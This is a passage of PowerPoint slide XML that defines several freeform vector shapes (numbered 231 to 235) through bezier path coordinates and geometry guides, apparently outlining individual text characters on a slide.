                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="305"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="33" y="236"/>
                    <a:pt x="49" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="218"/>
                    <a:pt x="66" y="218"/>
                    <a:pt x="102" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="218"/>
                    <a:pt x="203" y="218"/>
                    <a:pt x="203" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="283"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="116" y="30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90" name="Freeform 231">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9F6F8B1-7147-41CA-8E09-615D23BD7147}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId31"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3516314" y="3257551"/>
              <a:ext cx="80963" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 31 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 222"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 147 h 222"/>
                <a:gd name="T32" fmla="*/ 18 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="84"/>
                    <a:pt x="31" y="78"/>
                    <a:pt x="31" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="46"/>
                    <a:pt x="47" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="144" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="161" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="53" y="113"/>
                    <a:pt x="98" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="163" y="130"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="175"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="192"/>
                    <a:pt x="48" y="186"/>
                    <a:pt x="35" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="138"/>
                    <a:pt x="31" y="133"/>
                    <a:pt x="18" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="222"/>
                    <a:pt x="28" y="222"/>
                    <a:pt x="34" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="84" y="222"/>
                    <a:pt x="98" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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91" name="Freeform 232">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{944C8FCE-677B-46FE-BED5-2FA23190DAC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId32"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3617914" y="3259138"/>
              <a:ext cx="96838" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 125 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 179 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 170 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="184" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="193" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="53"/>
                    <a:pt x="227" y="45"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="179" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="95" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="218"/>
                    <a:pt x="170" y="218"/>
                    <a:pt x="170" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="188"/>
                    <a:pt x="157" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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92" name="Freeform 233">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A672CC8-19BF-4476-8ED5-0E00CBB205CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId33"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3736976" y="3257551"/>
              <a:ext cx="84138" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 178 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 112 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 34 w 196"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 115 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 145 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 167 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 115 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 111 h 222"/>
                <a:gd name="T22" fmla="*/ 109 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="168"/>
                    <a:pt x="149" y="192"/>
                    <a:pt x="112" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="115" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="145" y="30"/>
                    <a:pt x="145" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="155" y="59"/>
                    <a:pt x="167" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="115" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="109" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="173"/>
                    <a:pt x="196"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93" name="Freeform 234">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0107B0CF-6257-44F4-A25E-6415035EB0A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId34"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3840164" y="3262313"/>
              <a:ext cx="95250" cy="49213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 223"/>
                <a:gd name="T1" fmla="*/ 35 h 111"/>
                <a:gd name="T2" fmla="*/ 223 w 223"/>
                <a:gd name="T3" fmla="*/ 18 h 111"/>
                <a:gd name="T4" fmla="*/ 198 w 223"/>
                <a:gd name="T5" fmla="*/ 0 h 111"/>
                <a:gd name="T6" fmla="*/ 25 w 223"/>
                <a:gd name="T7" fmla="*/ 0 h 111"/>
                <a:gd name="T8" fmla="*/ 0 w 223"/>
                <a:gd name="T9" fmla="*/ 18 h 111"/>
                <a:gd name="T10" fmla="*/ 22 w 223"/>
                <a:gd name="T11" fmla="*/ 35 h 111"/>
                <a:gd name="T12" fmla="*/ 201 w 223"/>
                <a:gd name="T13" fmla="*/ 35 h 111"/>
                <a:gd name="T14" fmla="*/ 198 w 223"/>
                <a:gd name="T15" fmla="*/ 111 h 111"/>
                <a:gd name="T16" fmla="*/ 223 w 223"/>
                <a:gd name="T17" fmla="*/ 94 h 111"/>
                <a:gd name="T18" fmla="*/ 201 w 223"/>
                <a:gd name="T19" fmla="*/ 76 h 111"/>
                <a:gd name="T20" fmla="*/ 22 w 223"/>
                <a:gd name="T21" fmla="*/ 76 h 111"/>
                <a:gd name="T22" fmla="*/ 0 w 223"/>
                <a:gd name="T23" fmla="*/ 94 h 111"/>
                <a:gd name="T24" fmla="*/ 25 w 223"/>
                <a:gd name="T25" fmla="*/ 111 h 111"/>
                <a:gd name="T26" fmla="*/ 198 w 223"/>
                <a:gd name="T2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11">
                  <a:moveTo>
                    <a:pt x="201" y="35"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="35"/>
                    <a:pt x="223" y="35"/>
                    <a:pt x="223" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="0"/>
                    <a:pt x="205" y="0"/>
                    <a:pt x="198" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35"/>
                    <a:pt x="16" y="35"/>
                    <a:pt x="22" y="35"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="201" y="35"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="198" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="111"/>
                    <a:pt x="223" y="111"/>
                    <a:pt x="223" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="76"/>
                    <a:pt x="207" y="76"/>
                    <a:pt x="201" y="76"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="22" y="76"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="76"/>
                    <a:pt x="0" y="76"/>
                    <a:pt x="0" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="111"/>
                    <a:pt x="18" y="111"/>
                    <a:pt x="25" y="111"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="11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94" name="Freeform 235">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFCEE224-363D-49EA-8320-D39A2509D94B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId35"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3944939" y="3221038"/>
              <a:ext cx="106363" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 250"/>
                <a:gd name="T1" fmla="*/ 158 h 304"/>
                <a:gd name="T2" fmla="*/ 143 w 250"/>
                <a:gd name="T3" fmla="*/ 86 h 304"/>
                <a:gd name="T4" fmla="*/ 77 w 250"/>
                <a:gd name="T5" fmla="*/ 113 h 304"/>
                <a:gd name="T6" fmla="*/ 77 w 250"/>
                <a:gd name="T7" fmla="*/ 20 h 304"/>
                <a:gd name="T8" fmla="*/ 57 w 250"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 21 w 250"/>
                <a:gd name="T11" fmla="*/ 0 h 304"/>
                <a:gd name="T12" fmla="*/ 0 w 250"/>
                <a:gd name="T13" fmla="*/ 15 h 304"/>
                <a:gd name="T14" fmla="*/ 20 w 250"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 43 w 250"/>
                <a:gd name="T17" fmla="*/ 30 h 304"/>
                <a:gd name="T18" fmla="*/ 43 w 250"/>
                <a:gd name="T19" fmla="*/ 274 h 304"/>
                <a:gd name="T20" fmla="*/ 21 w 250"/>
                <a:gd name="T21" fmla="*/ 274 h 304"/>
                <a:gd name="T22" fmla="*/ 0 w 250"/>
                <a:gd name="T23" fmla="*/ 289 h 304"/>
                <a:gd name="T24" fmla="*/ 20 w 250"/>
                <a:gd name="T25" fmla="*/ 304 h 304"/>
                <a:gd name="T26" fmla="*/ 100 w 250"/>
                <a:gd name="T27" fmla="*/ 304 h 304"/>
                <a:gd name="T28" fmla="*/ 120 w 250"/>
                <a:gd name="T29" fmla="*/ 289 h 304"/>
                <a:gd name="T30" fmla="*/ 99 w 250"/>
                <a:gd name="T31" fmla="*/ 274 h 304"/>
                <a:gd name="T32" fmla="*/ 77 w 250"/>
                <a:gd name="T33" fmla="*/ 274 h 304"/>
                <a:gd name="T34" fmla="*/ 77 w 250"/>
                <a:gd name="T35" fmla="*/ 186 h 304"/>
                <a:gd name="T36" fmla="*/ 140 w 250"/>
                <a:gd name="T37" fmla="*/ 117 h 304"/>
                <a:gd name="T38" fmla="*/ 173 w 250"/>
                <a:gd name="T39" fmla="*/ 161 h 304"/>
                <a:gd name="T40" fmla="*/ 173 w 250"/>
                <a:gd name="T41" fmla="*/ 274 h 304"/>
                <a:gd name="T42" fmla="*/ 154 w 250"/>
                <a:gd name="T43" fmla="*/ 274 h 304"/>
                <a:gd name="T44" fmla="*/ 133 w 250"/>
                <a:gd name="T45" fmla="*/ 289 h 304"/>
                <a:gd name="T46" fmla="*/ 154 w 250"/>
                <a:gd name="T47" fmla="*/ 304 h 304"/>
                <a:gd name="T48" fmla="*/ 230 w 250"/>
                <a:gd name="T49" fmla="*/ 304 h 304"/>
                <a:gd name="T50" fmla="*/ 250 w 250"/>
                <a:gd name="T51" fmla="*/ 289 h 304"/>
                <a:gd name="T52" fmla="*/ 229 w 250"/>
                <a:gd name="T53" fmla="*/ 274 h 304"/>
                <a:gd name="T54" fmla="*/ 207 w 250"/>
                <a:gd name="T55" fmla="*/ 274 h 304"/>
                <a:gd name="T56" fmla="*/ 207 w 250"/>
                <a:gd name="T57" fmla="*/ 15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0" h="304">
                  <a:moveTo>
                    <a:pt x="207" y="158"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="108"/>
                    <a:pt x="182" y="86"/>
                    <a:pt x="143" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="86"/>
                    <a:pt x="87" y="103"/>
                    <a:pt x="77" y="113"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="5"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="57" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="304"/>
                    <a:pt x="120" y="304"/>
                    <a:pt x="120" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="274"/>
                    <a:pt x="107" y="274"/>
                    <a:pt x="99" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="186"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="136"/>
                    <a:pt x="114" y="117"/>
                    <a:pt x="140" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="117"/>
                    <a:pt x="173" y="131"/>
                    <a:pt x="173" y="161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="274"/>
                    <a:pt x="133" y="274"/>
                    <a:pt x="133" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="304"/>
                    <a:pt x="147" y="304"/>
                    <a:pt x="154" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="230" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="304"/>
                    <a:pt x="250" y="304"/>
                    <a:pt x="250" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="274"/>
                    <a:pt x="237" y="274"/>
                    <a:pt x="229" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="274"/>
                  </a:lnTo>
